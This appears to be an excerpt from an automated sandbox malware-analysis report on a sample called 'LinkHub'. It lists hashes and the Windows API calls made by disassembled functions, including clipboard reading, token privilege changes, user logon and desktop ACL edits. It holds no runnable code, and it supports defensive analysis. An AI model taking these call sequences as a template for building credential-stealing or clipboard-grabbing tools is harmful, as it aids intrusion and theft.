                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                    • Instruction ID: 3e8a04a60049280167ee22a6e873160d450e5f66be4191b2439a6627172f8577
                                                                    • Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                    • Instruction Fuzzy Hash: 01F02D36532A24D6DE313A27DC0575A33588F42334F154B16F529931D1EBB0E8628ED2
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID:
                                                                    • API String ID: 176396367-0
                                                                    • Opcode ID: 92a6b9fc4d488c06443c030f8f88c35764cf037f1adb821f9c99eba6a8e571cc
                                                                    • Instruction ID: 647db07a5fd22b545ee5754d4677643277459ab47123665267b5ed2be42435ec
                                                                    • Opcode Fuzzy Hash: 92a6b9fc4d488c06443c030f8f88c35764cf037f1adb821f9c99eba6a8e571cc
                                                                    • Instruction Fuzzy Hash: E0F028B36107006EC7149F29C806B67BF98EF44360F10812AFA1DCB2D0DB31E460CBA0
                                                                    APIs
                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 002BF987
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentVariable
                                                                    • String ID:
                                                                    • API String ID: 1431749950-0
                                                                    • Opcode ID: c11410bd96f7cec7d19b697bea22e3b4e52c7e7c6f564af9aed593a36d32e762
                                                                    • Instruction ID: 8a5beb0b0a10f22ae56b45e3c5ad0b8e02afc42392bb975cb23efe7528a4ee02
                                                                    • Opcode Fuzzy Hash: c11410bd96f7cec7d19b697bea22e3b4e52c7e7c6f564af9aed593a36d32e762
                                                                    • Instruction Fuzzy Hash: 71F04472610105BFCB05EBA5DC4AD9F77BCEF45750F004055F5059B261DA70EDA1CB51
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0027319C,00000001,00000364,?,00260165,?,?,002B11D9,0000FFFF), ref: 00275031
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 504a109b56331c464f839fa8037c970609d460945a1fcbc3eb9a754a096078bf
                                                                    • Instruction ID: f8ba798d9da11ce7d025aeebbeeedc2fb9dcd180384a99c90937afc69a8df0e2
                                                                    • Opcode Fuzzy Hash: 504a109b56331c464f839fa8037c970609d460945a1fcbc3eb9a754a096078bf
                                                                    • Instruction Fuzzy Hash: 92F0B436575E31A69B311E26DC05B5BB748AF497A0F14C011B81CD7190DAF0D8314AE0
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00260165,?,?,002B11D9,0000FFFF), ref: 00273BC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: be17a314b0844e87002e2a170e89734c3d989802c52036cbe01985404538edc2
                                                                    • Instruction ID: 7bb4c6f94e2b94989798937a7d22f928a35cac189dfe61e4540ce8034d681e53
                                                                    • Opcode Fuzzy Hash: be17a314b0844e87002e2a170e89734c3d989802c52036cbe01985404538edc2
                                                                    • Instruction Fuzzy Hash: 81E02B31270622A6DB31BE739C01B9B364CDF413A8F149161FC5C96190CF70CD70A5E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2feee3c2750da5d40d25ee1c170609de9834597c5ace3fab8f3d826749df8c79
                                                                    • Instruction ID: 649bcd346506e48c8832b1224daefd8e96fcdd5f25599e7b72c220374b90b2e6
                                                                    • Opcode Fuzzy Hash: 2feee3c2750da5d40d25ee1c170609de9834597c5ace3fab8f3d826749df8c79
                                                                    • Instruction Fuzzy Hash: 17F03075526712CFCB389F64D494816B7E8FF15319314893EE1D786510C77198A0DF51
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 2638373210-0
                                                                    • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                    • Instruction ID: c25e87a422c3c8d0936f1ea91ac925a98bc5fc225a79a9e1db0122f469abfd63
                                                                    • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                    • Instruction Fuzzy Hash: CAF0F87551020DFFDF05DF90C941E9EBBB9FB04318F208445F9159A151C376EA61ABA1
                                                                    APIs
                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00243963
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_
                                                                    • String ID:
                                                                    • API String ID: 1144537725-0
                                                                    • Opcode ID: c3783f68e15cfcb1c496d3c426d35f854cb776a8617e5140092caa68005b1ce7
                                                                    • Instruction ID: 0a23db8209d402e45bd284b642caf1c4204ca8af0b6c122abcf3bae430a87464
                                                                    • Opcode Fuzzy Hash: c3783f68e15cfcb1c496d3c426d35f854cb776a8617e5140092caa68005b1ce7
                                                                    • Instruction Fuzzy Hash: 33F0A7709103049FE753DF24DC497D67BBCA705708F0040A9A64496181D7744B98CF41
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00243A76
                                                                      • Part of subcall function 00248577: _wcslen.LIBCMT ref: 0024858A
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath_wcslen
                                                                    • String ID:
                                                                    • API String ID: 541455249-0
                                                                    • Opcode ID: bc97875d2b261e5e9b9171f2b311015cd7a33ad0d8ba32e67697e34a46b261bc
                                                                    • Instruction ID: 9469a458bfaf6266530f8ebea786c89873b79018fe143adc524a5d2f1b11db37
                                                                    • Opcode Fuzzy Hash: bc97875d2b261e5e9b9171f2b311015cd7a33ad0d8ba32e67697e34a46b261bc
                                                                    • Instruction Fuzzy Hash: 1AE0CD7690112457C720A3589C09FEE77DDDFC87A0F454071FC05D7258D960ED808A90
                                                                    APIs
                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002AE857
                                                                      • Part of subcall function 00248577: _wcslen.LIBCMT ref: 0024858A
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FolderPath_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2987691875-0
                                                                    • Opcode ID: eec3316292fb3ef057c94a35e5a566d39b70868fe942e48e91563013dc30584d
                                                                    • Instruction ID: 14283b33c796bfaec01fc8fd696377e7c4e6fe4ec275f5fd6d4a82d0b43008b2
                                                                    • Opcode Fuzzy Hash: eec3316292fb3ef057c94a35e5a566d39b70868fe942e48e91563013dc30584d
                                                                    • Instruction Fuzzy Hash: 7CD05EA19102282BDF64A774AC0DDBB3AACC740210F0006A1786DD3152EA30EE448AB0
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 002B1306
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: b34b31a3342f15cd73eaec483a41bd10a801bece049e6ba7ee697521e7a9bd22
                                                                    • Instruction ID: 52d0aa174c584e947208b70f8a4b987b95133d63dd47326a4d680399ef19d735
                                                                    • Opcode Fuzzy Hash: b34b31a3342f15cd73eaec483a41bd10a801bece049e6ba7ee697521e7a9bd22
                                                                    • Instruction Fuzzy Hash: 94D05EB1822324BF9B2C8B51DD4ACA776DCE901691380116FB802D2940F5A0FD10CAA0
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00280A84,?,?,00000000,?,00280A84,00000000,0000000C), ref: 00280737
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 5f1d240e81d483ef279ee9ea411d1c675c8571bd306070b943d1b8713f2b42d8
                                                                    • Instruction ID: 902217870250b968657b0019382b688ce545850d5a67253de673ab23edad778c
                                                                    • Opcode Fuzzy Hash: 5f1d240e81d483ef279ee9ea411d1c675c8571bd306070b943d1b8713f2b42d8
                                                                    • Instruction Fuzzy Hash: FED06C3200010DBBDF028F84ED06EDA3BAAFB48714F014000BE1856020C732E821AB90
                                                                    APIs
                                                                      • Part of subcall function 002A2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A205A
                                                                      • Part of subcall function 002A2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A2087
                                                                      • Part of subcall function 002A2010: GetLastError.KERNEL32 ref: 002A2097
                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 002A1BD2
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002A1BF4
                                                                    • CloseHandle.KERNEL32(?), ref: 002A1C05
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002A1C1D
                                                                    • GetProcessWindowStation.USER32 ref: 002A1C36
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 002A1C40
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002A1C5C
                                                                      • Part of subcall function 002A1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A1B48), ref: 002A1A20
                                                                      • Part of subcall function 002A1A0B: CloseHandle.KERNEL32(?,?,002A1B48), ref: 002A1A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                    • String ID: $default$winsta0$j0
                                                                    • API String ID: 22674027-173347267
                                                                    • Opcode ID: 8beaefeca9861509b6351d9ffece88cd9524dc4a219db05995179929de8dcc25
                                                                    • Instruction ID: c5f70588a0acc13a801d4b3e4471766b22f299727a218e7ecdb7f772412b2dcf
                                                                    • Opcode Fuzzy Hash: 8beaefeca9861509b6351d9ffece88cd9524dc4a219db05995179929de8dcc25
                                                                    • Instruction Fuzzy Hash: CD81AB7191160AAFDF119FA4ED49FEE7BBCEF0A310F04446AF914A61A0DB308D65CB60
                                                                    APIs
                                                                      • Part of subcall function 002A1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A1A60
                                                                      • Part of subcall function 002A1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002A14E7,?,?,?), ref: 002A1A6C
                                                                      • Part of subcall function 002A1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002A14E7,?,?,?), ref: 002A1A7B
                                                                      • Part of subcall function 002A1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002A14E7,?,?,?), ref: 002A1A82
                                                                      • Part of subcall function 002A1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A1A99
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002A1518
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002A154C
                                                                    • GetLengthSid.ADVAPI32(?), ref: 002A1563
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 002A159D
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002A15B9
                                                                    • GetLengthSid.ADVAPI32(?), ref: 002A15D0
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002A15D8
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 002A15DF
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002A1600
                                                                    • CopySid.ADVAPI32(00000000), ref: 002A1607
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002A1636
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002A1658
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002A166A
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A1691
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A1698
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A16A1
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A16A8
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A16B1
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A16B8
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 002A16C4
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A16CB
                                                                      • Part of subcall function 002A1ADF: GetProcessHeap.KERNEL32(00000008,002A14FD,?,00000000,?,002A14FD,?), ref: 002A1AED
                                                                      • Part of subcall function 002A1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002A14FD,?), ref: 002A1AF4
                                                                      • Part of subcall function 002A1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002A14FD,?), ref: 002A1B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: a3f4eec5e9bb33729de327a1893a2763c236f086fd7631f27f1f25a7fb316c77
                                                                    • Instruction ID: ca28929294a8b01ee94d7686d7fc7bfefb4e964d8e84936b17d5983b3f365b6f
                                                                    • Opcode Fuzzy Hash: a3f4eec5e9bb33729de327a1893a2763c236f086fd7631f27f1f25a7fb316c77
                                                                    • Instruction Fuzzy Hash: 12716CB291120ABBDF109FA4EC48FAEBBBCBF45711F084515E915E6190DB309D25CBA0
                                                                    APIs
                                                                    • OpenClipboard.USER32(002DDCD0), ref: 002BF586
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 002BF594
                                                                    • GetClipboardData.USER32(0000000D), ref: 002BF5A0
                                                                    • CloseClipboard.USER32 ref: 002BF5AC
                                                                    • GlobalLock.KERNEL32(00000000), ref: 002BF5E4
                                                                    • CloseClipboard.USER32 ref: 002BF5EE
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002BF619
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 002BF626
                                                                    • GetClipboardData.USER32(00000001), ref: 002BF62E
                                                                    • GlobalLock.KERNEL32(00000000), ref: 002BF63F
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002BF67F
                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 002BF695
                                                                    • GetClipboardData.USER32(0000000F), ref: 002BF6A1
                                                                    • GlobalLock.KERNEL32(00000000), ref: 002BF6B2
                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 002BF6D4
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002BF6F1
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002BF72F
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002BF750
                                                                    • CountClipboardFormats.USER32 ref: 002BF771
                                                                    • CloseClipboard.USER32 ref: 002BF7B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                    • String ID:
                                                                    • API String ID: 420908878-0
                                                                    • Opcode ID: a2a03120067833d90ca7a5ed2fd0174530b5c568f36738c32bafbefec286a6ee
                                                                    • Instruction ID: 05e01824cbbdaa4721b4cbd2f82afe827356b954b134080c3e71f1db50ee54b6
                                                                    • Opcode Fuzzy Hash: a2a03120067833d90ca7a5ed2fd0174530b5c568f36738c32bafbefec286a6ee
                                                                    • Instruction Fuzzy Hash: D861D2312142029FD314EF20ED88FAAB7A8EF84344F14456EF856872A2DB71DD55CFA2
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002B7403
                                                                    • FindClose.KERNEL32(00000000), ref: 002B7457
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002B7493
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002B74BA
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 002B74F7
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 002B7524
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                    • API String ID: 3830820486-3289030164
                                                                    • Opcode ID: 40662283ad4d7f04e0fce88dc7a772d65ed339e74f27e1cf6aa3ee94c3fa87d1
